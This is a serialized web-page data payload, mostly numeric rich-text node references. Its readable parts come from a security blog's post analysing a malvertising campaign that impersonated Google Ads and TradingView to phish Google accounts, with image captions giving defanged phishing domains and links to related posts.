"marks":33499,"value":29108,"nodeType":864},{},[],{"data":33501,"content":33504,"nodeType":996},{"target":33502},{"sys":33503},{"id":29113,"type":1001,"linkType":1002},[],{"data":33506,"content":33509,"nodeType":996},{"target":33507},{"sys":33508},{"id":29119,"type":1001,"linkType":1002},[],{"data":33511,"content":33514,"nodeType":996},{"target":33512},{"sys":33513},{"id":29125,"type":1001,"linkType":1002},[],{"data":33516,"content":33517,"nodeType":860},{},[33518],{"data":33519,"marks":33520,"value":29133,"nodeType":864},{},[],{"data":33522,"content":33525,"nodeType":996},{"target":33523},{"sys":33524},{"id":29138,"type":1001,"linkType":1002},[],{"data":33527,"content":33530,"nodeType":996},{"target":33528},{"sys":33529},{"id":29144,"type":1001,"linkType":1002},[],{"data":33532,"content":33533,"nodeType":860},{},[33534,33537,33544],{"data":33535,"marks":33536,"value":29152,"nodeType":864},{},[],{"data":33538,"content":33539,"nodeType":883},{"uri":29155},[33540],{"data":33541,"marks":33542,"value":29161,"nodeType":864},{},[33543],{"type":1455},{"data":33545,"marks":33546,"value":29165,"nodeType":864},{},[],{"data":33548,"content":33549,"nodeType":1005},{},[],{"data":33551,"content":33552,"nodeType":1009},{},[33553],{"data":33554,"marks":33555,"value":29176,"nodeType":864},{},[33556],{"type":899},{"data":33558,"content":33559,"nodeType":860},{},[33560,33563,33570],{"data":33561,"marks":33562,"value":29183,"nodeType":864},{},[],{"data":33564,"content":33565,"nodeType":883},{"uri":29186},[33566],{"data":33567,"marks":33568,"value":13810,"nodeType":864},{},[33569],{"type":1455},{"data":33571,"marks":33572,"value":29195,"nodeType":864},{},[],{"data":33574,"content":33577,"nodeType":996},{"target":33575},{"sys":33576},{"id":29200,"type":1001,"linkType":1002},[],{"data":33579,"content":33580,"nodeType":860},{},[33581],{"data":33582,"marks":33583,"value":29208,"nodeType":864},{},[],{"data":33585,"content":33586,"nodeType":860},{},[33587,33590,33597],{"data":33588,"marks":33589,"value":28577,"nodeType":864},{},[],{"data":33591,"content":33592,"nodeType":883},{"uri":13019},[33593],{"data":33594,"marks":33595,"value":315,"nodeType":864},{},[33596],{"type":1455},{"data":33598,"marks":33599,"value":28588,"nodeType":864},{},[],{"data":33601,"content":33602,"nodeType":1312},{},[33603],{"data":33604,"marks":33605,"value":29232,"nodeType":864},{},[33606],{"type":899},{"data":33608,"content":33609,"nodeType":860},{},[33610],{"data":33611,"marks":33612,"value":29239,"nodeType":864},{},[],{"data":33614,"content":33615,"nodeType":860},{},[33616],{"data":33617,"marks":33618,"value":29246,"nodeType":864},{},[],{"data":33620,"content":33621,"nodeType":860},{},[33622],{"data":33623,"marks":33624,"value":28556,"nodeType":864},{},[],{"data":33626,"content":33627,"nodeType":860},{},[33628,33631,33638],{"data":33629,"marks":33630,"value":29259,"nodeType":864},{},[],{"data":33632,"content":33633,"nodeType":883},{"uri":6237},[33634],{"data":33635,"marks":33636,"value":6242,"nodeType":864},{},[33637],{"type":1455},{"data":33639,"marks":33640,"value":29270,"nodeType":864},{},[],{"data":33642,"content":33643,"nodeType":1312},{},[33644],{"data":33645,"marks":33646,"value":29278,"nodeType":864},{},[33647],{"type":899},{"data":33649,"content":33650,"nodeType":860},{},[33651],{"data":33652,"marks":33653,"value":29285,"nodeType":864},{},[],{"data":33655,"content":33658,"nodeType":996},{"target":33656},{"sys":33657},{"id":29290,"type":1001,"linkType":1002},[],{"data":33660,"content":33661,"nodeType":1005},{},[],{"data":33663,"content":33664,"nodeType":1009},{},[33665],{"data":33666,"marks":33667,"value":5571,"nodeType":864},{},[33668],{"type":899},{"data":33670,"content":33671,"nodeType":860},{},[33672],{"data":33673,"marks":33674,"value":29308,"nodeType":864},{},[],{"data":33676,"content":33677,"nodeType":860},{},[33678],{"data":33679,"marks":33680,"value":28714,"nodeType":864},{},[],{"data":33682,"content":33683,"nodeType":1005},{},[],{"data":33685,"content":33686,"nodeType":1009},{},[33687],{"data":33688,"marks":33689,"value":3578,"nodeType":864},{},[33690],{"type":899},{"data":33692,"content":33693,"nodeType":860},{},[33694],{"data":33695,"marks":33696,"value":29331,"nodeType":864},{},[],{"data":33698,"content":33699,"nodeType":860},{},[33700],{"data":33701,"marks":33702,"value":19737,"nodeType":864},{},[],{"data":33704,"content":33705,"nodeType":860},{},[33706,33709,33716,33719,33726],{"data":33707,"marks":33708,"value":16314,"nodeType":864},{},[],{"data":33710,"content":33711,"nodeType":883},{"uri":10269},[33712],{"data":33713,"marks":33714,"value":10275,"nodeType":864},{},[33715],{"type":1455},{"data":33717,"marks":33718,"value":19754,"nodeType":864},{},[],{"data":33720,"content":33721,"nodeType":883},{"uri":1700},[33722],{"data":33723,"marks":33724,"value":10299,"nodeType":864},{},[33725],{"type":1455},{"data":33727,"marks":33728,"value":2924,"nodeType":864},{},[],{"data":33730,"content":33733,"nodeType":996},{"target":33731},{"sys":33732},{"id":27224,"type":1001,"linkType":1002},[],{"data":33735,"content":33736,"nodeType":860},{},[33737],{"data":33738,"marks":33739,"value":21,"nodeType":864},{},[],{"items":33741},[33742,33744],{"sys":33743,"name":6593},{"id":6592},{"sys":33745,"name":342},{"id":6596},{"items":33747},[33748],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":33749},{"url":4955},{"__typename":2059,"sys":33751,"content":33752,"title":23856,"synopsis":23857,"hashTags":59,"publishedDate":23858,"slug":23859,"tagsCollection":34249,"authorsCollection":34255},{"id":23279},{"json":33753},{"data":33754,"content":33755,"nodeType":856},{},[33756,33762,33768,33778,33783,33789,33792,33799,33805,33810,33823,33829,33850,33856,33861,33864,33871,33897,33902,33918,33923,33939,33945,33950,33953,33960,33966,33982,33988,34004,34010,34015,34018,34025,34031,34061,34067,34073,34113,34128,34137,34143,34146,34153,34169,34175,34181,34186,34189,34196,34212,34238,34243],{"data":33757,"content":33758,"nodeType":860},{},[33759],{"data":33760,"marks":33761,"value":23290,"nodeType":864},{},[],{"data":33763,"content":33764,"nodeType":860},{},[33765],{"data":33766,"marks":33767,"value":23297,"nodeType":864},{},[],{"data":33769,"content":33770,"nodeType":860},{},[33771,33774],{"data":33772,"marks":33773,"value":23304,"nodeType":864},{},[],{"data":33775,"marks":33776,"value":23309,"nodeType":864},{},[33777],{"type":899},{"data":33779,"content":33782,"nodeType":996},{"target":33780},{"sys":33781},{"id":23314,"type":1001,"linkType":1002},[],{"data":33784,"content":33785,"nodeType":860},{},[33786],{"data":33787,"marks":33788,"value":23322,"nodeType":864},{},[],{"data":33790,"content":33791,"nodeType":1005},{},[],{"data":33793,"content":33794,"nodeType":1009},{},[33795],{"data":33796,"marks":33797,"value":23333,"nodeType":864},{},[33798],{"type":899},{"data":33800,"content":33801,"nodeType":860},{},[33802],{"data":33803,"marks":33804,"value":23340,"nodeType":864},{},[],{"data":33806,"content":33809,"nodeType":996},{"target":33807},{"sys":33808},{"id":23345,"type":1001,"linkType":1002},[],{"data":33811,"content":33812,"nodeType":860},{},[33813,33816,33820],{"data":33814,"marks":33815,"value":23353,"nodeType":864},{},[],{"data":33817,"marks":33818,"value":23358,"nodeType":864},{},[33819],{"type":899},{"data":33821,"marks":33822,"value":23362,"nodeType":864},{},[],{"data":33824,"content":33825,"nodeType":860},{},[33826],{"data":33827,"marks":33828,"value":23369,"nodeType":864},{},[],{"data":33830,"content":33831,"nodeType":941},{},[33832,33841],{"data":33833,"content":33834,"nodeType":945},{},[33835],{"data":33836,"content":33837,"nodeType":860},{},[33838],{"data":33839,"marks":33840,"value":23382,"nodeType":864},{},[],{"data":33842,"content":33843,"nodeType":945},{},[33844],{"data":33845,"content":33846,"nodeType":860},{},[33847],{"data":33848,"marks":33849,"value":23392,"nodeType":864},{},[],{"data":33851,"content":33852,"nodeType":860},{},[33853],{"data":33854,"marks":33855,"value":23399,"nodeType":864},{},[],{"data":33857,"content":33860,"nodeType":996},{"target":33858},{"sys":33859},{"id":23404,"type":1001,"linkType":1002},[],{"data":33862,"content":33863,"nodeType":1005},{},[],{"data":33865,"content":33866,"nodeType":1009},{},[33867],{"data":33868,"marks":33869,"value":23416,"nodeType":864},{},[33870],{"type":899},{"data":33872,"content":33873,"nodeType":860},{},[33874,33877,33884,33887,33894],{"data":33875,"marks":33876,"value":23423,"nodeType":864},{},[],{"data":33878,"content":33879,"nodeType":883},{"uri":23426},[33880],{"data":33881,"marks":33882,"value":23432,"nodeType":864},{},[33883],{"type":1455},{"data":33885,"marks":33886,"value":23436,"nodeType":864},{},[],{"data":33888,"content":33889,"nodeType":883},{"uri":23439},[33890],{"data":33891,"marks":33892,"value":23445,"nodeType":864},{},[33893],{"type":1455},{"data":33895,"marks":33896,"value":23449,"nodeType":864},{},[],{"data":33898,"content":33901,"nodeType":996},{"target":33899},{"sys":33900},{"id":23454,"type":1001,"linkType":1002},[],{"data":33903,"content":33904,"nodeType":860},{},[33905,33908,33915],{"data":33906,"marks":33907,"value":23462,"nodeType":864},{},[],{"data":33909,"content":33910,"nodeType":883},{"uri":23465},[33911],{"data":33912,"marks":33913,"value":23471,"nodeType":864},{},[33914],{"type":1455},{"data":33916,"marks":33917,"value":10094,"nodeType":864},{},[],{"data":33919,"content":33922,"nodeType":996},{"target":33920},{"sys":33921},{"id":23479,"type":1001,"linkType":1002},[],{"data":33924,"content":33925,"nodeType":860},{},[33926,33929,33936],{"data":33927,"marks":33928,"value":23487,"nodeType":864},{},[],{"data":33930,"content":33931,"nodeType":883},{"uri":23490},[33932],{"data":33933,"marks":33934,"value":13810,"nodeType":864},{},[33935],{"type":1455},{"data":33937,"marks":33938,"value":23499,"nodeType":864},{},[],{"data":33940,"content":33941,"nodeType":860},{},[33942],{"data":33943,"marks":33944,"value":23506,"nodeType":864},{},[],{"data":33946,"content":33949,"nodeType":996},{"target":33947},{"sys":33948},{"id":23511,"type":1001,"linkType":1002},[],{"data":33951,"content":33952,"nodeType":1005},{},[],{"data":33954,"content":33955,"nodeType":1009},{},[33956],{"data":33957,"marks":33958,"value":23523,"nodeType":864},{},[33959],{"type":899},{"data":33961,"content":33962,"nodeType":860},{},[33963],{"data":33964,"marks":33965,"value":23530,"nodeType":864},{},[],{"data":33967,"content":33968,"nodeType":860},{},[33969,33972,33979],{"data":33970,"marks":33971,"value":23537,"nodeType":864},{},[],{"data":33973,"content":33974,"nodeType":883},{"uri":23540},[33975],{"data":33976,"marks":33977,"value":23546,"nodeType":864},{},[33978],{"type":1455},{"data":33980,"marks":33981,"value":23550,"nodeType":864},{},[],{"data":33983,"content":33984,"nodeType":860},{},[33985],{"data":33986,"marks":33987,"value":23557,"nodeType":864},{},[],{"data":33989,"content":33990,"nodeType":860},{},[33991,33994,34001],{"data":33992,"marks":33993,"value":23564,"nodeType":864},{},[],{"data":33995,"content":33996,"nodeType":883},{"uri":23567},[33997],{"data":33998,"marks":33999,"value":23573,"nodeType":864},{},[34000],{"type":1455},{"data":34002,"marks":34003,"value":23577,"nodeType":864},{},[],{"data":34005,"content":34006,"nodeType":860},{},[34007],{"data":34008,"marks":34009,"value":23584,"nodeType":864},{},[],{"data":34011,"content":34014,"nodeType":996},{"target":34012},{"sys":34013},{"id":23589,"type":1001,"linkType":1002},[],{"data":34016,"content":34017,"nodeType":1005},{},[],{"data":34019,"content":34020,"nodeType":1009},{},[34021],{"data":34022,"marks":34023,"value":23601,"nodeType":864},{},[34024],{"type":899},{"data":34026,"content":34027,"nodeType":860},{},[34028],{"data":34029,"marks":34030,"value":23608,"nodeType":864},{},[],{"data":34032,"content":34033,"nodeType":941},{},[34034,34043,34052],{"data":34035,"content":34036,"nodeType":945},{},[34037],{"data":34038,"content":34039,"nodeType":860},{},[34040],{"data":34041,"marks":34042,"value":23621,"nodeType":864},{},[],{"data":34044,"content":34045,"nodeType":945},{},[34046],{"data":34047,"content":34048,"nodeType":860},{},[34049],{"data":34050,"marks":34051,"value":23631,"nodeType":864},{},[],{"data":34053,"content":34054,"nodeType":945},{},[34055],{"data":34056,"content":34057,"nodeType":860},{},[34058],{"data":34059,"marks":34060,"value":23641,"nodeType":864},{},[],{"data":34062,"content":34063,"nodeType":860},{},[34064],{"data":34065,"marks":34066,"value":23648,"nodeType":864},{},[],{"data":34068,"content":34069,"nodeType":860},{},[34070],{"data":34071,"marks":34072,"value":23655,"nodeType":864},{},[],{"data":34074,"content":34075,"nodeType":941},{},[34076,34095,34104],{"data":34077,"content":34078,"nodeType":945},{},[34079],{"data":34080,"content":34081,"nodeType":860},{},[34082,34085,34092],{"data":34083,"marks":34084,"value":23668,"nodeType":864},{},[],{"data":34086,"content":34087,"nodeType":883},{"uri":23671},[34088],{"data":34089,"marks":34090,"value":23677,"nodeType":864},{},[34091],{"type":1455},{"data":34093,"marks":34094,"value":23681,"nodeType":864},{},[],{"data":34096,"content":34097,"nodeType":945},{},[34098],{"data":34099,"content":34100,"nodeType":860},{},[34101],{"data":34102,"marks":34103,"value":23691,"nodeType":864},{},[],{"data":34105,"content":34106,"nodeType":945},{},[34107],{"data":34108,"content":34109,"nodeType":860},{},[34110],{"data":34111,"marks":34112,"value":23701,"nodeType":864},{},[],{"data":34114,"content":34115,"nodeType":860},{},[34116,34119,34125],{"data":34117,"marks":34118,"value":23708,"nodeType":864},{},[],{"data":34120,"content":34121,"nodeType":883},{"uri":19546},[34122],{"data":34123,"marks":34124,"value":23715,"nodeType":864},{},[],{"data":34126,"marks":34127,"value":23719,"nodeType":864},{},[],{"data":34129,"content":34130,"nodeType":1116},{},[34131],{"data":34132,"content":34133,"nodeType":860},{},[34134],{"data":34135,"marks":34136,"value":23729,"nodeType":864},{},[],{"data":34138,"content":34139,"nodeType":860},{},[34140],{"data":34141,"marks":34142,"value":23736,"nodeType":864},{},[],{"data":34144,"content":34145,"nodeType":1005},{},[],{"data":34147,"content":34148,"nodeType":1009},{},[34149],{"data":34150,"marks":34151,"value":23747,"nodeType":864},{},[34152],{"type":899},{"data":34154,"content":34155,"nodeType":860},{},[34156,34159,34166],{"data":34157,"marks":34158,"value":23754,"nodeType":864},{},[],{"data":34160,"content":34161,"nodeType":883},{"uri":23757},[34162],{"data":34163,"marks":34164,"value":23763,"nodeType":864},{},[34165],{"type":1455},{"data":34167,"marks":34168,"value":23767,"nodeType":864},{},[],{"data":34170,"content":34171,"nodeType":860},{},[34172],{"data":34173,"marks":34174,"value":23774,"nodeType":864},{},[],{"data":34176,"content":34177,"nodeType":860},{},[34178],{"data":34179,"marks":34180,"value":23781,"nodeType":864},{},[],{"data":34182,"content":34185,"nodeType":996},{"target":34183},{"sys":34184},{"id":23786,"type":1001,"linkType":1002},[],{"data":34187,"content":34188,"nodeType":1005},{},[],{"data":34190,"content":34191,"nodeType":1009},{},[34192],{"data":34193,"marks":34194,"value":23798,"nodeType":864},{},[34195],{"type":899},{"data":34197,"content":34198,"nodeType":860},{},[34199,34202,34209],{"data":34200,"marks":34201,"value":23805,"nodeType":864},{},[],{"data":34203,"content":34204,"nodeType":883},{"uri":23808},[34205],{"data":34206,"marks":34207,"value":23814,"nodeType":864},{},[34208],{"type":1455},{"data":34210,"marks":34211,"value":23818,"nodeType":864},{},[],{"data":34213,"content":34214,"nodeType":860},{},[34215,34218,34225,34228,34235],{"data":34216,"marks":34217,"value":16314,"nodeType":864},{},[],{"data":34219,"content":34220,"nodeType":883},{"uri":10269},[34221],{"data":34222,"marks":34223,"value":10275,"nodeType":864},{},[34224],{"type":1455},{"data":34226,"marks":34227,"value":19754,"nodeType":864},{},[],{"data":34229,"content":34230,"nodeType":883},{"uri":1700},[34231],{"data":34232,"marks":34233,"value":10299,"nodeType":864},{},[34234],{"type":1455},{"data":34236,"marks":34237,"value":2924,"nodeType":864},{},[],{"data":34239,"content":34242,"nodeType":996},{"target":34240},{"sys":34241},{"id":23404,"type":1001,"linkType":1002},[],{"data":34244,"content":34245,"nodeType":860},{},[34246],{"data":34247,"marks":34248,"value":21,"nodeType":864},{},[],{"items":34250},[34251,34253],{"sys":34252,"name":342},{"id":6596},{"sys":34254,"name":6593},{"id":6592},{"items":34256},[34257],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":34258},{"url":2740},"blog/analysing-a-sophisticated-google-malvertising-attack",{"json":34261},{"data":34262,"content":34263,"nodeType":856},{},[34264],{"data":34265,"content":34266,"nodeType":860},{},[34267],{"data":34268,"marks":34269,"value":34270,"nodeType":864},{},[],"Push recently detected and blocked a malvertising attack impersonating TradingView, designed to hijack Google Workspace accounts via Attacker-in-the-Middle phishing. Here’s what you need to know. ",{"id":27968,"publishedAt":34272},"2026-08-12T11:53:29.517Z",{"items":34274},[34275,34277],{"sys":34276,"name":6593},{"id":6592},{"sys":34278,"name":342},{"id":6596},{"items":34280},[34281,34283,34285,34287,34289,34291,34293,34295,34297,34299,34301,34303,34305],{"sys":34282,"name":279,"slug":280,"tier":31},{"id":276},{"sys":34284,"name":519,"slug":520,"tier":31},{"id":516},{"sys":34286,"name":342,"slug":343,"tier":31},{"id":339},{"sys":34288,"name":440,"slug":441,"tier":45},{"id":437},{"sys":34290,"name":261,"slug":262,"tier":45},{"id":258},{"sys":34292,"name":324,"slug":325,"tier":45},{"id":321},{"sys":34294,"name":571,"slug":572,"tier":45},{"id":568},{"sys":34296,"name":466,"slug":467,"tier":45},{"id":463},{"sys":34298,"name":475,"slug":476,"tier":45},{"id":472},{"sys":34300,"name":315,"slug":316,"tier":45},{"id":312},{"sys":34302,"name":511,"slug":512,"tier":45},{"id":508},{"sys":34304,"name":351,"slug":352,"tier":45},{"id":348},{"sys":34306,"name":431,"slug":432,"tier":45},{"id":428},"FLM-1o_o6QaNOwDyiLUo2QqV24gLaljg5Ssim9_cBEg",{"id":34309,"title":28782,"authorsCollection":34310,"content":34315,"extension":228,"faqItemsCollection":34739,"faqTitle":59,"featured":6,"hashTags":59,"meta":34741,"metaTitle":34742,"ogImage":59,"postType":5740,"publishedDate":28784,"relatedBlogPostsCollection":34743,"slug":28785,"stem":36335,"subtitle":59,"summary":36336,"synopsis":28783,"sys":36347,"tagsCollection":36349,"topicsCollection":36355,"__hash__":36379},"blog/blog/analysing-a-malvertising-attack-targeting-business-google-accounts.json",{"items":34311},[34312],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":34313,"profilePicture":34314},[18135],{"url":2740},{"json":34316,"links":34651},{"data":34317,"content":34318,"nodeType":856},{},[34319,34326,34332,34337,34343,34373,34379,34384,34390,34395,34400,34405,34410,34415,34418,34425,34431,34437,34443,34450,34455,34471,34477,34493,34498,34501,34508,34514,34580,34586,34589,34596,34602,34608,34614,34640,34645],{"data":34320,"content":34321,"nodeType":1009},{},[34322],{"data":34323,"marks":34324,"value":20796,"nodeType":864},{},[34325],{"type":899},{"data":34327,"content":34328,"nodeType":860},{},[34329],{"data":34330,"marks":34331,"value":28428,"nodeType":864},{},[],{"data":34333,"content":34336,"nodeType":996},{"target":34334},{"sys":34335},{"id":28433,"type":1001,"linkType":1002},[],{"data":34338,"content":34339,"nodeType":860},{},[34340],{"data":34341,"marks":34342,"value":28441,"nodeType":864},{},[],{"data":34344,"content":34345,"nodeType":941},{},[34346,34355,34364],{"data":34347,"content":34348,"nodeType":945},{},[34349],{"data":34350,"content":34351,"nodeType":860},{},[34352],{"data":34353,"marks":34354,"value":28454,"nodeType":864},{},[],{"data":34356,"content":34357,"nodeType":945},{},[34358],{"data":34359,"content":34360,"nodeType":860},{},[34361],{"data":34362,"marks":34363,"value":28464,"nodeType":864},{},[],{"data":34365,"content":34366,"nodeType":945},{},[34367],{"data":34368,"content":34369,"nodeType":860},{},[34370],{"data":34371,"marks":34372,"value":28474,"nodeType":864},{},[],{"data":34374,"content":34375,"nodeType":860},{},[34376],{"data":34377,"marks":34378,"value":28481,"nodeType":864},{},[],{"data":34380,"content":34383,"nodeType":996},{"target":34381},{"sys":34382},{"id":28486,"type":1001,"linkType":1002},[],{"data":34385,"content":34386,"nodeType":860},{},[34387],{"data":34388,"marks":34389,"value":28494,"nodeType":864},{},[],{"data":34391,"content":34394,"nodeType":996},{"target":34392},{"sys":34393},{"id":28499,"type":1001,"linkType":1002},[],{"data":34396,"content":34399,"nodeType":996},{"target":34397},{"sys":34398},{"id":28505,"type":1001,"linkType":1002},[],{"data":34401,"content":34404,"nodeType":996},{"target":34402},{"sys":34403},{"id":28511,"type":1001,"linkType":1002},[],{"data":34406,"content":34409,"nodeType":996},{"target":34407},{"sys":34408},{"id":28517,"type":1001,"linkType":1002},[],{"data":34411,"content":34414,"nodeType":996},{"target":34412},{"sys":34413},{"id":28523,"type":1001,"linkType":1002},[],{"data":34416,"content":34417,"nodeType":1005},{},[],{"data":34419,"content":34420,"nodeType":1009},{},[34421],{"data":34422,"marks":34423,"value":28535,"nodeType":864},{},[34424],{"type":899},{"data":34426,"content":34427,"nodeType":860},{},[34428],{"data":34429,"marks":34430,"value":28542,"nodeType":864},{},[],{"data":34432,"content":34433,"nodeType":860},{},[34434],{"data":34435,"marks":34436,"value":28549,"nodeType":864},{},[],{"data":34438,"content":34439,"nodeType":860},{},[34440],{"data":34441,"marks":34442,"value":28556,"nodeType":864},{},[],{"data":34444,"content":34445,"nodeType":860},{},[34446],{"data":34447,"marks":34448,"value":28564,"nodeType":864},{},[34449],{"type":899},{"data":34451,"content":34454,"nodeType":996},{"target":34452},{"sys":34453},{"id":28569,"type":1001,"linkType":1002},[],{"data":34456,"content":34457,"nodeType":860},{},[34458,34461,34468],{"data":34459,"marks":34460,"value":28577,"nodeType":864},{},[],{"data":34462,"content":34463,"nodeType":883},{"uri":13019},[34464],{"data":34465,"marks":34466,"value":315,"nodeType":864},{},[34467],{"type":1455},{"data":34469,"marks":34470,"value":28588,"nodeType":864},{},[],{"data":34472,"content":34473,"nodeType":860},{},[34474],{"data":34475,"marks":34476,"value":28595,"nodeType":864},{},[],{"data":34478,"content":34479,"nodeType":860},{},[34480,34483,34490],{"data":34481,"marks":34482,"value":28602,"nodeType":864},{},[],{"data":34484,"content":34485,"nodeType":883},{"uri":6237},[34486],{"data":34487,"marks":34488,"value":6242,"nodeType":864},{},[34489],{"type":1455},{"data":34491,"marks":34492,"value":28160,"nodeType":864},{},[],{"data":34494,"content":34497,"nodeType":996},{"target":34495},{"sys":34496},{"id":27224,"type":1001,"linkType":1002},[],{"data":34499,"content":34500,"nodeType":1005},{},[],{"data":34502,"content":34503,"nodeType":1009},{},[34504],{"data":34505,"marks":34506,"value":5571,"nodeType":864},{},[34507],{"type":899},{"data":34509,"content":34510,"nodeType":860},{},[34511],{"data":34512,"marks":34513,"value":28634,"nodeType":864},{},[],{"data":34515,"content":34516,"nodeType":941},{},[34517,34526,34535,34544,34553,34562,34571],{"data":34518,"content":34519,"nodeType":945},{},[34520],{"data":34521,"content":34522,"nodeType":860},{},[34523],{"data":34524,"marks":34525,"value":28647,"nodeType":864},{},[],{"data":34527,"content":34528,"nodeType":945},{},[34529],{"data":34530,"content":34531,"nodeType":860},{},[34532],{"data":34533,"marks":34534,"value":28657,"nodeType":864},{},[],{"data":34536,"content":34537,"nodeType":945},{},[34538],{"data":34539,"content":34540,"nodeType":860},{},[34541],{"data":34542,"marks":34543,"value":28667,"nodeType":864},{},[],{"data":34545,"content":34546,"nodeType":945},{},[34547],{"data":34548,"content":34549,"nodeType":860},{},[34550],{"data":34551,"marks":34552,"value":28677,"nodeType":864},{},[],{"data":34554,"content":34555,"nodeType":945},{},[34556],{"data":34557,"content":34558,"nodeType":860},{},[34559],{"data":34560,"marks":34561,"value":28687,"nodeType":864},{},[],{"data":34563,"content":34564,"nodeType":945},{},[34565],{"data":34566,"content":34567,"nodeType":860},{},[34568],{"data":34569,"marks":34570,"value":28697,"nodeType":864},{},[],{"data":34572,"content":34573,"nodeType":945},{},[34574],{"data":34575,"content":34576,"nodeType":860},{},[34577],{"data":34578,"marks":34579,"value":28707,"nodeType":864},{},[],{"data":34581,"content":34582,"nodeType":860},{},[34583],{"data":34584,"marks":34585,"value":28714,"nodeType":864},{},[],{"data":34587,"content":34588,"nodeType":1005},{},[],{"data":34590,"content":34591,"nodeType":1009},{},[34592],{"data":34593,"marks":34594,"value":21018,"nodeType":864},{},[34595],{"type":899},{"data":34597,"content":34598,"nodeType":860},{},[34599],{"data":34600,"marks":34601,"value":28731,"nodeType":864},{},[],{"data":34603,"content":34604,"nodeType":860},{},[34605],{"data":34606,"marks":34607,"value":28738,"nodeType":864},{},[],{"data":34609,"content":34610,"nodeType":860},{},[34611],{"data":34612,"marks":34613,"value":21039,"nodeType":864},{},[],{"data":34615,"content":34616,"nodeType":860},{},[34617,34620,34627,34630,34637],{"data":34618,"marks":34619,"value":16314,"nodeType":864},{},[],{"data":34621,"content":34622,"nodeType":883},{"uri":10269},[34623],{"data":34624,"marks":34625,"value":10275,"nodeType":864},{},[34626],{"type":1455},{"data":34628,"marks":34629,"value":19754,"nodeType":864},{},[],{"data":34631,"content":34632,"nodeType":883},{"uri":1700},[34633],{"data":34634,"marks":34635,"value":10299,"nodeType":864},{},[34636],{"type":1455},{"data":34638,"marks":34639,"value":2924,"nodeType":864},{},[],{"data":34641,"content":34644,"nodeType":996},{"target":34642},{"sys":34643},{"id":27224,"type":1001,"linkType":1002},[],{"data":34646,"content":34647,"nodeType":860},{},[34648],{"data":34649,"marks":34650,"value":21,"nodeType":864},{},[],{"entries":34652},{"hyperlink":34653,"inline":34654,"block":34655},[],[],[34656,34670,34675,34679,34685,34689,34694,34699,34737],{"sys":34657,"__typename":1740,"content":34658,"name":34669,"title":59},{"id":28433},{"json":34659},{"data":34660,"content":34661,"nodeType":856},{},[34662],{"data":34663,"content":34664,"nodeType":860},{},[34665],{"data":34666,"marks":34667,"value":34668,"nodeType":864},{},[],"We regularly come across malvertising attacks where attackers take out ads against commonly used apps and websites to intercept users Googling for the login URL rather than accessing it from a bookmark. If you’re not on guard against possible malicious ads, it can be easy to miss that you’re not accessing the legitimate URL.","Google Malvertising Insight Box 1",{"sys":34671,"__typename":1724,"title":34672,"caption":34672,"layoutMode":59,"file":34673},{"id":28486},"When we came to investigate, the site had already been taken offline.",{"url":34674,"width":1736,"height":27843},"https://images.ctfassets.net/y1cdw1ablpvd/3LePBDurx90LO3jhnBH5Ua/d704a7650bfd9f7b98e2945bb6dd509c/image1.png",{"sys":34676,"__typename":18759,"title":34677,"arcadeDemoUrl":34678,"playText":22447},{"id":28499},"Google Malvertising Attack Demo","https://demo.arcade.software/LHB2RWbijgTTPTCxRPBm?embed",{"sys":34680,"__typename":1724,"title":34681,"caption":34681,"layoutMode":59,"file":34682},{"id":28505},"Timeline from one of the detections, showing hxxps://adsloginaccess.kartra.com being used as a redirect before serving up the phishing site at hxxps://adsgooglie.odoo.com",{"url":34683,"width":1736,"height":34684},"https://images.ctfassets.net/y1cdw1ablpvd/3xYelIFp9bS9xEnE6TNpgG/25519667c624cc76a6bf1bdbb279d60a/image2.png",1551,{"sys":34686,"__typename":1724,"title":34687,"caption":34687,"layoutMode":59,"file":34688},{"id":28511},"Google Search returning a top ad for a page impersonating the Google Ads login page, hosted on Odoo.",{"url":27842,"width":1736,"height":27843},{"sys":34690,"__typename":1724,"title":34691,"caption":34691,"layoutMode":59,"file":34692},{"id":28517},"Phishing site landing page impersonating the real Google Ads landing page.",{"url":34693,"width":1736,"height":27843},"https://images.ctfassets.net/y1cdw1ablpvd/5fnOP14PejZqJqg9l29xYV/c6f3a175aa367ed7bd222f05352646ee/image5.png",{"sys":34695,"__typename":1724,"title":34696,"caption":34696,"layoutMode":59,"file":34697},{"id":28523},"AiTM phishing page hosted on hxxps://ads-o.odoo.com",{"url":34698,"width":1736,"height":27843},"https://images.ctfassets.net/y1cdw1ablpvd/6VzjvK3FE9mVoYOzx8FrXk/af3a997c49dfb0d5cbf231d2006c7d5f/image3.png",{"sys":34700,"__typename":1740,"content":34701,"name":34736,"title":59},{"id":28569},{"json":34702},{"nodeType":856,"data":34703,"content":34704},{},[34705],{"nodeType":860,"data":34706,"content":34707},{},[34708,34712,34720,34724,34733],{"nodeType":864,"value":34709,"marks":34710,"data":34711},"Campaigns targeting Google accounts specifically are becoming increasingly common. We also identified a ",[],{},{"nodeType":883,"data":34713,"content":34715},{"uri":34714},"/blog/uncovering-a-calendly-themed-phishing-campaign",[34716],{"nodeType":864,"value":34717,"marks":34718,"data":34719},"campaign targeting Google Ad accounts via highly targeted phishing emails",[],{},{"nodeType":864,"value":34721,"marks":34722,"data":34723}," around the same time that this attack was identified. Similarly, we’ve also blogged about ",[],{},{"nodeType":883,"data":34725,"content":34727},{"uri":34726},"/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers",[34728],{"nodeType":864,"value":34729,"marks":34730,"data":34732},"Scattered Spider-linked malvertising campaigns earlier this year",[34731],{"type":1455},{},{"nodeType":864,"value":2924,"marks":34734,"data":34735},[],{},"Google Malvertising Insight Box 2",{"sys":34738,"__typename":1717,"type":1718,"ctaText":30103,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":30037},{"id":27224},{"items":34740},[],{},"Analysing a malvertising attack targeting Google accounts 